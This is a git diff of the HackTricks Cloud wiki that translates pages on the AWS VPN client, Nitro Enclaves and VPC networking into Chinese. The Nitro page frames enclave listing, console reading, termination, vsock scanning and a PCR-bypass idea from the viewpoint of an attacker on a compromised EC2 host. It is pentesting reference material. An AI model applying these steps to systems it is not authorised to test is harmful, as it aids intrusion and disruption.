+这些凭证属于用户 `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: 进一步研究这些凭证的权限)。 -The credentials belong to the user `arn:aws:sts:::assumed-role/aws-vpn-client-metrics-analytics-access-role/CognitoIdentityCredentials` (TODO: research more about the permissions of this credentials). +**opvn 配置文件** -**opvn config files** +如果 **VPN 连接已建立**,您应该在系统中搜索 **`.opvn`** 配置文件。此外,您可以在 **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`** 中找到 **配置**。 -If a **VPN connection was stablished** you should search for **`.opvn`** config files in the system. 
Moreover, one place where you could find the **configurations** is in **`$HOME/.config/AWSVPNClient/OpenVpnConfigs`** - -#### **Post Exploitaiton** +#### **后期利用** {{#ref}} ../../aws-post-exploitation/aws-vpn-post-exploitation.md {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md index 0575a17d8..4230061b8 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md @@ -2,21 +2,20 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -AWS Nitro is a suite of **innovative technologies** that form the underlying platform for AWS EC2 instances. Introduced by Amazon to **enhance security, performance, and reliability**, Nitro leverages custom **hardware components and a lightweight hypervisor**. It abstracts much of the traditional virtualization functionality to dedicated hardware and software, **minimizing the attack surface** and improving resource efficiency. By offloading virtualization functions, Nitro allows EC2 instances to deliver **near bare-metal performance**, making it particularly beneficial for resource-intensive applications. Additionally, the Nitro Security Chip specifically ensures the **security of the hardware and firmware**, further solidifying its robust architecture. +AWS Nitro 是一套 **创新技术**,构成了 AWS EC2 实例的基础平台。由亚马逊推出,以 **增强安全性、性能和可靠性**,Nitro 利用定制的 **硬件组件和轻量级虚拟机监控程序**。它将传统虚拟化功能的大部分抽象到专用硬件和软件中,**最小化攻击面**并提高资源效率。通过卸载虚拟化功能,Nitro 使 EC2 实例能够提供 **接近裸金属的性能**,这对于资源密集型应用特别有利。此外,Nitro 安全芯片专门确保 **硬件和固件的安全性**,进一步巩固其强大的架构。 ### Nitro Enclaves -**AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards. +**AWS Nitro Enclaves** 提供一个安全的、**隔离的计算环境**,专门设计用于处理高度敏感的数据。利用 AWS Nitro 系统,这些隔离区确保强大的 **隔离和安全性**,非常适合 **处理机密信息**,如个人身份信息或财务记录。它们具有极简的环境,显著降低数据暴露的风险。此外,Nitro Enclaves 支持加密证明,允许用户验证只有授权代码在运行,这对于维护严格的合规性和数据保护标准至关重要。 > [!CAUTION] -> Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. +> Nitro Enclave 镜像是 **在 EC2 实例内部运行**的,您无法从 AWS 网络控制台查看 EC2 实例是否在运行 Nitro Enclave 镜像。 -## Nitro Enclave CLI installation - -Follow the all instructions [**from the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave). 
However, these are the most important ones: +## Nitro Enclave CLI 安装 +按照 [**文档中的所有说明**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave)。然而,以下是最重要的说明: ```bash # Install tools sudo amazon-linux-extras install aws-nitro-enclaves-cli -y @@ -32,47 +31,39 @@ nitro-cli --version # Start and enable the Nitro Enclaves allocator service. sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service ``` - ## Nitro Enclave Images -The images that you can run in Nitro Enclave are based on docker images, so you can create your Nitro Enclave images from docker images like: - +您可以在 Nitro Enclave 中运行的镜像基于 docker 镜像,因此您可以从 docker 镜像创建您的 Nitro Enclave 镜像,例如: ```bash # You need to have the docker image accesible in your running local registry # Or indicate the full docker image URL to access the image nitro-cli build-enclave --docker-uri : --output-file nitro-img.eif ``` +如您所见,Nitro Enclave 镜像使用扩展名 **`eif`**(Enclave Image File)。 -As you can see the Nitro Enclave images use the extension **`eif`** (Enclave Image File). - -The output will look similar to: - +输出将类似于: ``` Using the locally available Docker image... Enclave Image successfully created. { - "Measurements": { - "HashAlgorithm": "Sha384 { ... }", - "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284", - "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f", - "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3" - } +"Measurements": { +"HashAlgorithm": "Sha384 { ... }", +"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284", +"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f", +"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3" +} } ``` +### 运行映像 -### Run an Image - -As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave), in order to run an enclave image you need to assign it memory of **at least 4 times the size of the `eif` file**. It's possible to configure the default resources to give to it in the file - +根据 [**文档**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli#run-connect-and-terminate-the-enclave),为了运行一个 enclave 映像,您需要为其分配 **至少是 `eif` 文件大小的 4 倍的内存**。可以在文件中配置默认资源以分配给它。 ```shell /etc/nitro_enclaves/allocator.yaml ``` - > [!CAUTION] -> Always remember that you need to **reserve some resources for the parent EC2** instance also! - -After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with: +> 始终记住,您还需要为**父 EC2** 实例**保留一些资源**! 
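+下面是一个配置该文件的最小示意(其中的具体数值只是假设的示例,并非来自本文档;内存建议至少为 `eif` 文件大小的 4 倍,`memory_mib` 和 `cpu_count` 用于设置默认的内存与 vCPU 预留):
+```bash
+# Example/assumed values -- adjust to your own eif size (memory should be >= 4x the eif size)
+cat <<'EOF' | sudo tee /etc/nitro_enclaves/allocator.yaml
+---
+# Memory (MiB) reserved for enclaves
+memory_mib: 3072
+# Number of vCPUs reserved for enclaves
+cpu_count: 2
+EOF
+```
+写入后,下一个命令块中重启 `nitro-enclaves-allocator.service` 的步骤会让这些默认值生效。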
+在知道要分配给映像的资源并且甚至修改了配置文件后,可以使用以下命令运行一个 enclave 映像: ```shell # Restart the service so the new default values apply sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service @@ -80,80 +71,72 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n # Indicate the CPUs and memory to give nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16 ``` - ### Enumerate Enclaves -If you compromise and EC2 host it's possible to get a list of running enclave images with: - +如果您攻陷了一个 EC2 主机,可以使用以下命令获取正在运行的 enclave 镜像列表: ```bash nitro-cli describe-enclaves ``` - -It's **not possible to get a shell** inside a running enclave image because thats the main purpose of enclave, however, if you used the parameter **`--debug-mode`**, it's possible to get the **stdout** of it with: - +不可能在运行的 enclave 镜像内获取 shell,因为这正是 enclave 的主要目的。然而,如果您使用参数 **`--debug-mode`**,则可以通过以下方式获取其 **stdout**: ```shell ENCLAVE_ID=$(nitro-cli describe-enclaves | jq -r ".[0].EnclaveID") nitro-cli console --enclave-id ${ENCLAVE_ID} ``` - ### Terminate Enclaves -If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with: - +如果攻击者通过默认方式攻陷了一个 EC2 实例,他将无法在其中获得 shell,但他将能够通过以下方式**终止它们**: ```shell nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID} ``` - ## Vsocks -The only way to communicate with an **enclave** running image is using **vsocks**. +与运行图像的 **enclave** 进行通信的唯一方式是使用 **vsocks**。 -**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments. +**虚拟套接字 (vsock)** 是 Linux 中的一种套接字系列,专门设计用于促进虚拟机 (**VMs**) 与其 **hypervisors** 之间,或虚拟机 **之间** 的 **通信**。Vsock 使得高效的 **双向通信** 成为可能,而无需依赖主机的网络堆栈。这使得虚拟机即使在没有网络配置的情况下也能进行通信,**使用 32 位上下文 ID (CID) 和端口号** 来识别和管理连接。vsock API 支持流和数据报套接字类型,类似于 TCP 和 UDP,为虚拟环境中的用户级应用程序提供了多功能的工具。 > [!TIP] -> Therefore, an vsock address looks like this: `:` +> 因此,vsock 地址看起来像这样:`:` -To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**: +要找到运行图像的 **CIDs**,您可以执行以下命令并获取 **`EnclaveCID`**:
nitro-cli describe-enclaves
 
 [
-  {
-    "EnclaveName": "secure-channel-example",
-    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
-    "ProcessID": 10131,
+  {
+    "EnclaveName": "secure-channel-example",
+    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
+    "ProcessID": 10131,
     "EnclaveCID": 16,
     "NumberOfCPUs": 2,
-    "CPUIDs": [
-      1,
-      3
-    ],
-    "MemoryMiB": 1024,
-    "State": "RUNNING",
-    "Flags": "DEBUG_MODE",
-    "Measurements": {
-      "HashAlgorithm": "Sha384 { ... }",
-      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
-      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
-      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
-    }
-  }
+    "CPUIDs": [
+      1,
+      3
+    ],
+    "MemoryMiB": 1024,
+    "State": "RUNNING",
+    "Flags": "DEBUG_MODE",
+    "Measurements": {
+      "HashAlgorithm": "Sha384 { ... }",
+      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+    }
+  }
 ]
 
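+拿到 **`EnclaveCID`** 之后,可以粗略地探测该 CID 上哪些 vsock 端口在监听。下面是一个基于 `socat` 的简单草图(假设 CID 为上面示例输出中的 16,端口范围也只是示例;这只是一个思路示意,不是本文档原有的工具):
+```bash
+# Rough sketch: probe vsock ports on a given CID with socat (CID=16 taken from the example output above)
+# NOTE: services that keep the connection open may hit the timeout and be missed;
+#       a dedicated scanner (see the warning below) is more reliable.
+CID=16
+for PORT in $(seq 1 1024); do
+  if echo "" | timeout 1 socat - VSOCK-CONNECT:$CID:$PORT >/dev/null 2>&1; then
+    echo "vsock port open: $CID:$PORT"
+  fi
+done
+```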
> [!WARNING] -> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). +> 请注意,从主机上无法知道 CID 是否暴露任何端口!除非使用一些 **vsock 端口扫描器,如** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner)。 -### Vsock Server/Listener +### Vsock 服务器/监听器 -Find here a couple of examples: +这里有几个示例: - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
-Simple Python Listener - +简单的 Python 监听器 ```python #!/usr/bin/env python3 @@ -173,30 +156,26 @@ s.listen() print(f"Connection opened by cid={remote_cid} port={remote_port}") while True: - buf = conn.recv(64) - if not buf: - break +buf = conn.recv(64) +if not buf: +break - print(f"Received bytes: {buf}") +print(f"Received bytes: {buf}") ``` -
- ```bash # Using socat socat VSOCK-LISTEN:,fork EXEC:"echo Hello from server!" ``` +### Vsock 客户端 -### Vsock Client - -Examples: +示例: - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
-Simple Python Client - +简单的 Python 客户端 ```python #!/usr/bin/env python3 @@ -212,64 +191,51 @@ s.connect((CID, PORT)) s.sendall(b"Hello, world!") s.close() ``` -
- ```bash # Using socat echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000 ``` - ### Vsock Proxy -The tool vsock-proxy allows to proxy a vsock proxy with another address, for example: - +工具 vsock-proxy 允许使用另一个地址代理 vsock 代理,例如: ```bash vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml ``` - -This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`: - +这将把 **vsock 中的本地端口 8001** 转发到 `ip-ranges.amazonaws.com:443`,文件 **`your-vsock-proxy.yaml`** 可能包含以下内容,以允许访问 `ip-ranges.amazonaws.com:443`: ```yaml allowlist: - - { address: ip-ranges.amazonaws.com, port: 443 } +- { address: ip-ranges.amazonaws.com, port: 443 } ``` - -It's possible to see the vsock addresses (**`:`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port): - +可以通过以下方式查看 EC2 主机使用的 vsock 地址 (**`:`**)(注意 `3:8001`,3 是 CID,8001 是端口): ```bash sudo ss -l -p -n | grep v_str v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) ``` - ## Nitro Enclave Atestation & KMS -The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF. +Nitro Enclaves SDK 允许一个 enclave 从 Nitro **Hypervisor** 请求一个 **加密签名的证明文档**,该文档包含特定于该 enclave 的 **唯一测量值**。这些测量值,包括 **哈希和平台配置寄存器 (PCRs)**,在证明过程中用于 **证明 enclave 的身份** 和 **与外部服务建立信任**。证明文档通常包含像 PCR0、PCR1 和 PCR2 这样的值,这些值在构建和保存 enclave EIF 时你已经遇到过。 -From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values: +根据 [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves),这些是 PCR 值: -
PCRHash of ...Description
PCR0Enclave image fileA contiguous measure of the contents of the image file, without the section data.
PCR1Linux kernel and bootstrapA contiguous measurement of the kernel and boot ramfs data.
PCR2ApplicationA contiguous, in-order measurement of the user applications, without the boot ramfs.
PCR3IAM role assigned to the parent instanceA contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.
PCR4Instance ID of the parent instanceA contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.
PCR8Enclave image file signing certificateA measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.
+
PCR哈希值...描述
PCR0Enclave 镜像文件镜像文件内容的连续测量,不包括部分数据。
PCR1Linux 内核和引导内核和引导 ramfs 数据的连续测量。
PCR2应用程序用户应用程序的连续、按顺序测量,不包括引导 ramfs。
PCR3分配给父实例的 IAM 角色分配给父实例的 IAM 角色的连续测量。确保只有在父实例具有正确的 IAM 角色时,证明过程才会成功。
PCR4父实例的实例 ID父实例 ID 的连续测量。确保只有在父实例具有特定实例 ID 时,证明过程才会成功。
PCR8Enclave 镜像文件签名证书为 enclave 镜像文件指定的签名证书的测量。确保只有在 enclave 从由特定证书签名的 enclave 镜像文件引导时,证明过程才会成功。
-You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**. +你可以将 **加密证明** 集成到你的应用程序中,并利用与 **AWS KMS** 等服务的预构建集成。AWS KMS 可以 **验证 enclave 证明**,并在其密钥策略中提供基于证明的条件密钥 (`kms:RecipientAttestation:ImageSha384` 和 `kms:RecipientAttestation:PCR`)。这些策略确保 AWS KMS 仅在 enclave 的证明文档有效且满足 **指定条件** 时,才允许使用 KMS 密钥进行操作。 > [!TIP] -> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. +> 请注意,调试模式下的 Enclaves (--debug) 生成的证明文档的 PCR 由零组成 (`000000000000000000000000000000000000000000000000`)。因此,检查这些值的 KMS 策略将失败。 ### PCR Bypass -From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement). +从攻击者的角度来看,注意到某些 PCR 允许修改 enclave 镜像的某些部分或全部,并且仍然有效(例如,PCR4 仅检查父实例的 ID,因此在该 EC2 中运行任何 enclave 镜像将满足此潜在 PCR 要求)。 -Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections. +因此,攻击者如果攻陷 EC2 实例,可能能够运行其他 enclave 镜像以绕过这些保护。 -The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO. +关于如何修改/创建新镜像以绕过每个保护(特别是那些不那么明显的保护)的研究仍然待完成。 ## References - [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) -- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) +- AWS Nitro 教程的所有部分:[https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md index 03277bfd1..08e9fe935 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md @@ -4,37 +4,37 @@ ## AWS Networking in a Nutshell -A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**). 
+一个 **VPC** 包含一个 **网络 CIDR**,如 10.0.0.0/16(以及它的 **路由表** 和 **网络 ACL**)。 -This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**. +这个 VPC 网络被划分为 **子网络**,因此 **子网络** 与 **VPC**、**路由表** 和 **网络 ACL** 直接 **相关**。 -Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**. +然后,附加到服务(如 EC2 实例)的 **网络接口** 与 **子网络** 通过 **安全组** **连接**。 -Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**. +因此,**安全组** 将限制使用它的网络 **接口** 的暴露端口,**独立于子网络**。而 **网络 ACL** 将 **限制** 暴露端口到 **整个网络**。 -Moreover, in order to **access Internet**, there are some interesting configurations to check: +此外,为了 **访问互联网**,有一些有趣的配置需要检查: -- A **subnetwork** can **auto-assign public IPv4 addresses** -- An **instance** created in the network that **auto-assign IPv4 addresses can get one** -- An **Internet gateway** need to be **attached** to the **VPC** - - You could also use **Egress-only internet gateways** -- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. - - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) +- **子网络** 可以 **自动分配公共 IPv4 地址** +- 在网络中创建的 **实例** 如果 **自动分配 IPv4 地址可以获得一个** +- 需要将 **互联网网关** **附加** 到 **VPC** +- 你还可以使用 **仅出网关** +- 你还可以在 **私有子网** 中拥有一个 **NAT 网关**,这样可以从该私有子网 **连接到外部服务**,但 **无法从外部访问它们**。 +- NAT 网关可以是 **公共的**(访问互联网)或 **私有的**(访问其他 VPC) ![](<../../../../images/image (274).png>) ## VPC -Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs... +亚马逊 **虚拟私有云**(Amazon VPC)使您能够 **在您定义的虚拟网络中启动 AWS 资源**。这个虚拟网络将有多个子网、互联网网关以访问互联网、ACL、安全组、IP... ### Subnets -Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure. +子网有助于加强更高水平的安全性。**相似资源的逻辑分组** 也有助于您在基础设施中保持 **管理的便利性**。 -- Valid CIDR are from a /16 netmask to a /28 netmask. -- A subnet cannot be in different availability zones at the same time. -- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. -- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** +- 有效的 CIDR 范围从 /16 网络掩码到 /28 网络掩码。 +- 一个子网不能同时位于不同的可用区。 +- **AWS 为每个子网保留前三个主机 IP 地址** **用于** **内部 AWS 使用**:第一个主机地址用于 VPC 路由器。第二个地址保留用于 AWS DNS,第三个地址保留用于将来使用。 +- 直接访问互联网的子网称为 **公共子网**,而私有子网则不。
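+要快速区分公共子网和私有子网,可以检查子网是否自动分配公共 IPv4,以及其路由表中是否有指向 Internet Gateway 的 `0.0.0.0/0` 路由。下面是一个简单的枚举示意(使用标准的 AWS CLI 命令,输出字段的选择仅作参考):
+```bash
+# Which subnets auto-assign public IPv4 addresses?
+aws ec2 describe-subnets \
+  --query 'Subnets[].{Subnet:SubnetId,VPC:VpcId,CIDR:CidrBlock,AZ:AvailabilityZone,AutoPublicIP:MapPublicIpOnLaunch}' \
+  --output table
+
+# Which route tables have a default route pointing to an Internet Gateway (igw-...)?
+aws ec2 describe-route-tables \
+  --query 'RouteTables[].{RouteTable:RouteTableId,VPC:VpcId,Routes:Routes[].[DestinationCidrBlock,GatewayId]}'
+```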
@@ -42,15 +42,15 @@ Subnets helps to enforce a greater level of security. **Logical grouping of simi ### Route Tables -Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the: +路由表确定 VPC 中子网的流量路由。它们确定哪些网络流量被转发到互联网或 VPN 连接。您通常会找到对以下内容的访问: -- Local VPC +- 本地 VPC - NAT -- Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). - - In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. -- VPC endpoints (to access S3 from private networks) +- 互联网网关 / 仅出网关(需要为 VPC 提供互联网访问)。 +- 为了使子网公开,您需要 **创建** 并 **附加** 一个 **互联网网关** 到您的 VPC。 +- VPC 端点(从私有网络访问 S3) -In the following images you can check the differences in a default public network and a private one: +在以下图像中,您可以检查默认公共网络和私有网络之间的差异:
@@ -58,142 +58,138 @@ In the following images you can check the differences in a default public networ ### ACLs -**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges. +**网络访问控制列表(ACLs)**:网络 ACL 是控制子网进出网络流量的防火墙规则。它们可以用于允许或拒绝特定 IP 地址或范围的流量。 -- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections -- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed +- 通常使用安全组来允许/拒绝访问,但这是完全切断已建立反向 shell 的唯一方法。安全组中的修改规则不会停止已经建立的连接。 +- 然而,这适用于整个子网络,禁止某些内容时要小心,因为所需的功能可能会受到干扰。 ### Security Groups -Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\ -Usually this is used to open dangerous ports in instances, such as port 22 for example: +安全组是一个虚拟 **防火墙**,控制 VPC 中实例的入站和出站网络 **流量**。关系 1 SG 对 M 实例(通常是 1 对 1)。\ +通常这用于在实例中打开危险端口,例如端口 22:
### Elastic IP Addresses -An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account. +一个 _弹性 IP 地址_ 是一个 **静态 IPv4 地址**,旨在用于动态云计算。弹性 IP 地址分配给您的 AWS 账户,并且在您释放之前属于您。通过使用弹性 IP 地址,您可以通过快速重新映射地址到您账户中的另一个实例来掩盖实例或软件的故障。 ### Connection between subnets -By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on. +默认情况下,所有子网的 **自动分配公共 IP 地址已关闭**,但可以打开。 -**A local route within a route table enables communication between VPC subnets.** +**路由表中的本地路由使 VPC 子网之间的通信成为可能。** -If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. +如果您 **连接一个子网与另一个子网,您无法访问与其他子网连接的子网,您需要直接与它们建立连接**。**这也适用于互联网网关**。您不能通过子网连接访问互联网,您需要将互联网网关分配给您的子网。 ### VPC Peering -VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. +VPC 对等连接允许您 **将两个或多个 VPC 连接在一起**,使用 IPV4 或 IPV6,就像它们是同一网络的一部分。 -Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\ -If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\ -Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.** +一旦建立对等连接,**一个 VPC 中的资源可以访问另一个 VPC 中的资源**。VPC 之间的连接通过现有的 AWS 网络基础设施实现,因此它是高度可用的,没有带宽瓶颈。由于 **对等连接的操作就像它们是同一网络的一部分**,因此在使用 CIDR 块范围时有一些限制。\ +如果您的 VPC 有 **重叠或重复的 CIDR** 范围,那么 **您将无法将 VPC 对等连接在一起**。\ +每个 AWS VPC **只与其对等连接通信**。例如,如果您在 VPC 1 